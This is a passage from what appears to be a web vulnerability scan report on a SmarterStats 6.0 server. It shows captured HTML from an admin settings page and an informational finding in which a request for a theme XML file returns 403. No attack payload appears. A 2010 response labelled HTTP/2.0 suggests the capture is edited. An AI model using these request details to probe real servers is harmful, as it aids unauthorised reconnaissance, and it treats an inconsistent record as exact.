               <td id="ctl00_MPH_exSettingSmarterLogs_Label" class="Indent Fixed">SmarterLog Path</td><td class=" Setting"><input name="ctl00$MPH$txtSmarterLogDirectory" type="text" value="C:\SmarterLogs" size="40" id="ctl00_MPH_txtSmarterLogDirectory" />
                               <input type="button" value="Browse" onclick="SmarterLogBrowse()" />
                           </td>
           </tr><tr id="ctl00_MPH_lstTimeZone">
               <td id="ctl00_MPH_lstTimeZone_Label" class="Indent Fixed">Time Zone</td><td id="ctl00_MPH_lstTimeZone_Setting" class="Setting"><span id="ctl00_MPH_lstTimeZone_ReadOnlyLabel">(GMT-06:00) Central Time (US & Canada)</span></td>
           </tr><tr id="ctl00_MPH_ddlChangeSiteAdmin">
               <td id="ctl00_MPH_ddlChangeSiteAdmin_Label" class="Indent Fixed">Site Admin</td><td id="ctl00_MPH_ddlChangeSiteAdmin_Setting" class="Setting"><select name="ctl00$MPH$ddlChangeSiteAdmin_SettingDropDown" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$MPH$ddlChangeSiteAdmin_SettingDropDown\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_MPH_ddlChangeSiteAdmin_SettingDropDown">
                   <option selected="selected" value="">New User</option>
                   <option value="hoytnet">hoytnet</option>

               </select></td>
           </tr>
       </table>
                   <table id="ctl00_MPH_tblAdminCreate" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_txtAdminNewUserName">
               <td id="ctl00_MPH_txtAdminNewUserName_Label" class="Indent Fixed">Site Admin Username</td><td id="ctl00_MPH_txtAdminNewUserName_Setting" class="Setting"><input name="ctl00$MPH$txtAdminNewUserName_SettingText" type="text" id="ctl00_MPH_txtAdminNewUserName_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_txtAdminNewPassword">
               <td id="ctl00_MPH_txtAdminNewPassword_Label" class="Indent Fixed">Site Admin Password</td><td id="ctl00_MPH_txtAdminNewPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAdminNewPassword_SettingText" type="password" id="ctl00_MPH_txtAdminNewPassword_SettingText" class="text" autocomplete="off" /></td>
           </tr>
       </table>
                   <table id="ctl00_MPH_SettingsContainer5" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_chkSeoEnabled">
               <td id="ctl00_MPH_chkSeoEnabled_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkSeoEnabled_Setting" class="Setting"><input id="ctl00_MPH_chkSeoEnabled_SettingCheck" type="checkbox" name="ctl00$MPH$chkSeoEnabled_SettingCheck" checked="checked" onclick="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$MPH$chkSeoEnabled_SettingCheck\&#39;,\&#39;\&#39;)&#39;, 0)" /><label for="ctl00_MPH_chkSeoEnabled_SettingCheck">Enable SEO</label></td>
           </tr>
       </table>
               </span></div>
   
               <div id='ctl00_MPH_LogOptionsTab' class='' style='display:none'>
       <span id="ctl00_MPH_LogOptionsTab">
                   <table id="ctl00_MPH_SettingsContainer2" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_lstLogLocation">
               <td id="ctl00_MPH_lstLogLocation_Label" class="Indent Fixed">Log Location</td><td id="ctl00_MPH_lstLogLocation_Setting" class="Setting"><select name="ctl00$MPH$lstLogLocation_SettingDropDown" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$MPH$lstLogLocation_SettingDropDown\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_MPH_lstLogLocation_SettingDropDown">
                   <option selected="selected" value="Local">Local Path or UNC Path</option>
                   <option value="FTP">FTP</option>

               </select></td>
           </tr><tr id="ctl00_MPH_lstLogFormat">
               <td id="ctl00_MPH_lstLogFormat_Label" class="Indent Fixed">Log Format</td><td id="ctl00_MPH_lstLogFormat_Setting" class="Setting"><select name="ctl00$MPH$lstLogFormat_SettingDropDown" id="ctl00_MPH_lstLogFormat_SettingDropDown">
                   <option selected="selected" value="W3Cex">IIS - W3Cex Log Format</option>
                   <option value="IIS">IIS - Microsoft IIS Log Format</option>
                   <option value="NCSA">IIS - NCSA Common Log Format</option>
                   <option value="ApacheCLF">Apache - Common Log Format</option>
                   <option value="ApacheNCSAEx">Apache - NCSA Extended Log Format</option>
                   <option value="IPlanetCLF">IPlanet - Common Log Format</option>
                   <option value="CLF">Other - Common Log Format</option>

               </select></td>
           </tr><tr id="ctl00_MPH_lstMonthsToKeepSmStats">
               <td id="ctl00_MPH_lstMonthsToKeepSmStats_Label" class="Indent Fixed">Auto-Deletion</td><td id="ctl00_MPH_lstMonthsToKeepSmStats_Setting" class="Setting"><select name="ctl00$MPH$lstMonthsToKeepSmStats_SettingDropDown" id="ctl00_MPH_lstMonthsToKeepSmStats_SettingDropDown">
                   <option selected="selected" value="0">Never Delete</option>
                   <option value="1">Delete after 1 months</option>
                   <option value="2">Delete after 2 months</option>
                   <option value="3">Delete after 3 months</option>
                   <option value="4">Delete after 4 months</option>
                   <option value="5">Delete after 5 months</option>
                   <option value="6">Delete after 6 months</option>
                   <option value="7">Delete after 7 months</option>
                   <option value="8">Delete after 8 months</option>
                   <option value="9">Delete after 9 months</option>
                   <option value="10">Delete after 10 months</option>
                   <option value="11">Delete after 11 months</option>
                   <option value="12">Delete after 12 months</option>
                   <option value="13">Delete after 13 months</option>
                   <option value="14">Delete after 14 months</option>
                   <option value="15">Delete after 15 months</option>
                   <option value="16">Delete after 16 months</option>
                   <option value="17">Delete after 17 months</option>
                   <option value="18">Delete after 18 months</option>
                   <option value="19">Delete after 19 months</option>
                   <option value="20">Delete after 20 months</option>
                   <option value="21">Delete after 21 months</option>
                   <option value="22">Delete after 22 months</option>
                   <option value="23">Delete after 23 months</option>
                   <option value="24">Delete after 24 months</option>
                   <option value="25">Delete after 25 months</option>
                   <option value="26">Delete after 26 months</option>
                   <option value="27">Delete after 27 months</option>
                   <option value="28">Delete after 28 months</option>
                   <option value="29">Delete after 29 months</option>
                   <option value="30">Delete after 30 months</option>
                   <option value="31">Delete after 31 months</option>
                   <option value="32">Delete after 32 months</option>
                   <option value="33">Delete after 33 months</option>
                   <option value="34">Delete after 34 months</option>
                   <option value="35">Delete after 35 months</option>
                   <option value="36">Delete after 36 months</option>

               </select></td>
           </tr><tr id="ctl00_MPH_ExtensibleSetting1">
               <td id="ctl00_MPH_ExtensibleSetting1_Label" class="Indent Fixed">Export Directory</td><td class=" Setting"><input name="ctl00$MPH$txtExportLogDirectory" type="text" size="40" id="ctl00_MPH_txtExportLogDirectory" />
                               <input type="button" value="Browse" onclick="ExportLogBrowse()" />
                           </td>
           </tr><tr id="ctl00_MPH_txtLogFileExportLocURL">
               <td id="ctl00_MPH_txtLogFileExportLocURL_Label" class="Indent Fixed">Export Url</td><td id="ctl00_MPH_txtLogFileExportLocURL_Setting" class="Setting"><input name="ctl00$MPH$txtLogFileExportLocURL_SettingText" type="text" size="40" id="ctl00_MPH_txtLogFileExportLocURL_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_chkStripAfterSemi">
               <td id="ctl00_MPH_chkStripAfterSemi_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkStripAfterSemi_Setting" class="Setting"><input id="ctl00_MPH_chkStripAfterSemi_SettingCheck" type="checkbox" name="ctl00$MPH$chkStripAfterSemi_SettingCheck" /><label for="ctl00_MPH_chkStripAfterSemi_SettingCheck">Enable removal of URL items after semicolon (used for jsessionid)</label></td>
           </tr><tr id="ctl00_MPH_txtDefaultDocuments">
               <td id="ctl00_MPH_txtDefaultDocuments_Setting" class="Indent Setting" colspan="2"><span class='Label'>Default Documents (one per line)<br /></span><textarea name="ctl00$MPH$txtDefaultDocuments_SettingText" rows="4" cols="50" id="ctl00_MPH_txtDefaultDocuments_SettingText" class="text">
index.htm
index.html
default.asp
default.aspx</textarea></td>
           </tr>
       </table>
               </span></div>
   
               <div id='ctl00_MPH_LogLocationsTab' class='' style='display:none'>
       <span id="ctl00_MPH_LogLocationsTab">
                   <span id="ctl00_MPH_ctxLogLocations">
<!-- HyperMenu -->
       <div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl02' name='ctl00$MPH$ctl02' style='z-index:800'>
           <li class='hmItem hmFirst' id='ctl00_MPH_ctl02_hm0' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Add<span class='hmArrow'></span></a>
           <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
               <li class='hmItem hmFirst hmLast' id='ctl00_MPH_ctl02_hm0_hm0' style='z-index: 800'><a class='hmA' href='#'>Log Location</a></li>
           </ul><div class='hmScrollDown'></div></div>
           </li>
           <li class='hmItem' id='ctl00_MPH_ctl02_hm1' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
           <li class='hmItem hmLast' id='ctl00_MPH_ctl02_hm2' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
       </ul>
       <div class='hmScrollDown'></div></div>
       </div>
       </span>
                   <div id="ctl00_MPH_UpdatePanel3">
           
                           
<div class="HyperGridWrapper" id="ctl00_MPH_grdLogLocations">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_grdLogLocations_Table"><tr><td class="NoItems" colspan="0">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_grdLogLocations_HiddenInput" id="ctl00_MPH_grdLogLocations_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_grdLogLocations_HiddenLSR" id="ctl00_MPH_grdLogLocations_HiddenLSR" value="" />
</div>
</div>

                       
       </div>
               </span></div>
   
               <div id='ctl00_MPH_LogFTPTab' class='' style='display:none'>
       <span id="ctl00_MPH_LogFTPTab">
                   
               </span></div>
   
               <div id='ctl00_MPH_SeoOptionsTab' class='' style='display:none'>
       <span id="ctl00_MPH_SeoOptionsTab">
                   <table id="ctl00_MPH_ucSiteSeoSettings_tblSEO" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords">
               <td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_Label" class="Indent Fixed">Max Keywords</td><td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_Setting" class="Setting"><input name="ctl00$MPH$ucSiteSeoSettings$txtSeoMaxKeywords_SettingText" type="text" value="5" size="3" id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors">
               <td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_Label" class="Indent Fixed">Max Competitors</td><td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_Setting" class="Setting"><input name="ctl00$MPH$ucSiteSeoSettings$txtSeoMaxCompetitors_SettingText" type="text" value="5" size="3" id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking">
               <td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_Label" class="Indent Fixed">Max Position to Retrieve</td><td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_Setting" class="Setting"><input name="ctl00$MPH$ucSiteSeoSettings$txtSeoMaxRanking_SettingText" type="text" value="100" size="3" id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_SettingText" class="text" /></td>
           </tr>
       </table>
                   <table id="ctl00_MPH_ucSiteSeoSearchEngineSettings_tblSeoSearchEngines" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines">
               <td id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_Label" class="Indent Fixed">Search Engines</td><td id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_Setting" class="Setting"><table id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox" class="CheckboxList" border="0">
                   <tr>
                       <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_0" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$0" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_0">Google</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_8" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$8" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_8">Google (DE)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_15" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$15" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_15">Google (JP)</label></td>
                   </tr><tr>
                       <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_1" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$1" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_1">Yahoo</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_9" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$9" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_9">Google (ES)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_16" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$16" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_16">Google (KR)</label></td>
                   </tr><tr>
                       <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_2" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$2" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_2">Ask</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_10" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$10" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_10">Google (FR)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_17" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$17" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_17">Google (MX)</label></td>
                   </tr><tr>
                       <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_3" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$3" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_3">Bing</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_11" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$11" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_11">Google (HK)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_18" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$18" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_18">Google (NL)</label></td>
                   </tr><tr>
                       <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_4" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$4" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_4">Google (AU)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_12" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$12" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_12">Google (IN)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_19" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$19" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_19">Google (TW)</label></td>
                   </tr><tr>
                       <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_5" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$5" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_5">Google (BR)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_13" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$13" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_13">Google (IL)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_20" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$20" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_20">Google (RU)</label></td>
                   </tr><tr>
                       <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_6" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$6" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_6">Google (CA)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_14" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$14" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_14">Google (IT)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_21" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$21" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_21">Google (UK)</label></td>
                   </tr><tr>
                       <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_7" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$7" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_7">Google (CN)</label></td><td></td><td></td>
                   </tr>
               </table></td>
           </tr>
       </table>

               </span></div>
   
               <div id='ctl00_MPH_LogStatusTab' class='' style='display:none'>
       <span id="ctl00_MPH_LogStatusTab">
                   
<div class="HyperGridWrapper" id="ctl00_MPH_grdLogStatus">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_grdLogStatus_Table"><tr><td class="NoItems" colspan="0">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_grdLogStatus_HiddenInput" id="ctl00_MPH_grdLogStatus_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_grdLogStatus_HiddenLSR" id="ctl00_MPH_grdLogStatus_HiddenLSR" value="" />
</div>
</div>

               </span></div>
   
               <div id='ctl00_MPH_SEOStatusTab' class='' style='display:none'>
       <span id="ctl00_MPH_SEOStatusTab">
                   
<div class="HyperGridWrapper" id="ctl00_MPH_grdSeoStatus">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_grdSeoStatus_Table"><tr><td class="NoItems" colspan="0">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_grdSeoStatus_HiddenInput" id="ctl00_MPH_grdSeoStatus_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_grdSeoStatus_HiddenLSR" id="ctl00_MPH_grdSeoStatus_HiddenLSR" value="" />
</div>
</div>

               </span></div>
   
           </div>

       |0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||0|hiddenField|__LASTFOCUS||26168|hiddenField|__VIEWSTATE|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|126|asyncPostBackControlIDs||ctl00$BPH$btnSave,,ctl00$BPH$btnEdit,,ctl00$MPH$btnRefresh,,ctl00$BPH$mnu1,,ctl00$MPH$btnUpdateIISImport,,ctl00$BPH$btnDelete,|0|postBackControlIDs|||95|updatePanelIDs||tctl00$UpdatePanel1,,tctl00$TPH$UpdatePanel1,,tctl00$MPH$UpdatePanel5,,tctl00$MPH$UpdatePanel3,|22|childUpdatePanelIDs||ctl00$MPH$UpdatePanel3|67|panelsToRefreshIDs||ctl00$UpdatePanel1,,ctl00$TPH$UpdatePanel1,,ctl00$MPH$UpdatePanel5,|2|asyncPostBackTimeout||90|32|formAction||frmSite.aspx?SiteId=1&popup=true|20|pageTitle||Sites - SmarterStats|224|scriptBlock|ScriptPath|/ScriptResource.axd?d=pVn15ziXvQY5aBffxiDTK6PUkVd1wbLwZ8qHXgDTDQU-gDmeOQZCbCnf3LN8cb6wKZJNHgRyjasDbTS9TuTZ7GXz6UL6zabFuTHuGM9izuBi-gzcVhEZX9Fg6cQx4oJc6iXtzA8ahWISPmTnWBlMNk0W7V9Kl_5HxQNbPSm8qmJcO3ou2wT9aun3Nb592DHA0&t=26c081|198|scriptStartupBlock|ScriptContentNoTags|
function ShowContextMenu_ctl00_MPH_ctl02(evt) {
   $('#ctl00_MPH_ctl02').showHyperContextMenu(evt);
   evt.cancelBubble = true;
   if (evt.stopPropagation) evt.stopPropagation();
   return false;
}
|51|scriptStartupBlock|ScriptContentNoTags|if (document.ResizeEvent) document.ResizeEvent();
|58|scriptStartupBlock|ScriptContentNoTags|$('#ctl00_MPH_txtAdminNewPassword_SettingText').val('');
|293|scriptStartupBlock|ScriptContentNoTags|
function DelayedSetupctl00_MPH_grdLogLocations() { }
if (self.ctl00_MPH_grdLogLocationsHGIsCallback)
   DelayedSetupctl00_MPH_grdLogLocations();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_grdLogLocations, 100);});
self.ctl00_MPH_grdLogLocationsHGIsCallback = true;
|278|scriptStartupBlock|ScriptContentNoTags|
function DelayedSetupctl00_MPH_grdLogStatus() { }
if (self.ctl00_MPH_grdLogStatusHGIsCallback)
   DelayedSetupctl00_MPH_grdLogStatus();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_grdLogStatus, 100);});
self.ctl00_MPH_grdLogStatusHGIsCallback = true;
|278|scriptStartupBlock|ScriptContentNoTags|
function DelayedSetupctl00_MPH_grdSeoStatus() { }
if (self.ctl00_MPH_grdSeoStatusHGIsCallback)
   DelayedSetupctl00_MPH_grdSeoStatus();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_grdSeoStatus, 100);});
self.ctl00_MPH_grdSeoStatusHGIsCallback = true;
|648|scriptStartupBlock|ScriptContentNoTags|$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_OptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_LogOptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem3":"ctl00_MPH_LogLocationsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem4":"ctl00_MPH_LogFTPTab","ctl00_TPH_HyperTabStrip1_HyperTabItem5":"ctl00_MPH_SeoOptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem7":"ctl00_MPH_LogStatusTab","ctl00_TPH_HyperTabStrip1_HyperTabItem8":"ctl00_MPH_SEOStatusTab"},"ClientCallbacks":{"onTabChanged":"TabChanged"}}); });
|48|scriptStartupBlock|ScriptContentNoTags|modules['vmNotBlank_txt']='Must have a value';
|141|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Site Name","vcID":"ctl00_MPH_txtDomainName_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
|48|scriptStartupBlock|ScriptContentNoTags|modules['vmOptional_txt']='Value is optional';
|140|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Site Url","vcID":"ctl00_MPH_txtDomainUrl_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
|156|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Site Admin Username","vcID":"ctl00_MPH_txtAdminNewUserName_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},true);});
|157|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Site Admin Password","vcID":"ctl00_MPH_txtAdminNewPassword_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
|152|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Export Url","vcID":"ctl00_MPH_txtLogFileExportLocURL_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
|171|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Default Documents (one per line)","vcID":"ctl00_MPH_txtDefaultDocuments_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
|573|scriptStartupBlock|ScriptContentNoTags|$(function() { $('#ctl00_MPH_ctl02').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_MPH_ctl02_hm0":"__doPostBack(\u0027ctl00$BPH$mnu1\u0027,\u0027ctl00_BPH_mnu1_btnAdd\u0027)","ctl00_MPH_ctl02_hm0_hm0":"__doPostBack(\u0027ctl00$BPH$mnu1\u0027,\u0027ctl00_BPH_mnu1_btnAdd_btnAddLogLocation\u0027)","ctl00_MPH_ctl02_hm1":"__doPostBack(\u0027ctl00$BPH$btnEdit\u0027,\u0027\u0027)","ctl00_MPH_ctl02_hm2":"DoDeleteQuery_ctl00_BPH_btnDelete();"},"ClientCallbacks":{}}); });
|45|scriptStartupBlock|ScriptContentNoTags|modules['vmNumber_txt']='Must be a number';
|58|scriptStartupBlock|ScriptContentNoTags|modules['vmNumberGreater_txt']='Must be {0} or greater';
|202|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Max Keywords","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
|208|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Max Competitors","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
|213|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Max Position to Retrieve","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
|184|scriptBlock|ScriptPath|/ScriptResource.axd?d=J4GaAPvIQnKMlo_D4Qzm0xa_SfNPfhG-b75huVuGxjWeCTjnztP__eaRa_pbROzW4k2QpoHJQ-uBs4nJPYlOSUcDyDiDF_VzNI93UxMsc1qsbj8BlU_60tzY90-zez8Je4ZNE7PKenoQMyfzxRT0cg2&t=41e66e32|41|focus||ctl00_MPH_txtAdminNewUserName_SettingText|

11.5. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/ButtonBarIcons.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/ButtonBarIcons.xml

Request

GET /App_Themes/Default/ButtonBarIcons.xml HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 403 Forbidden
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:10:43 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Forbidden</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
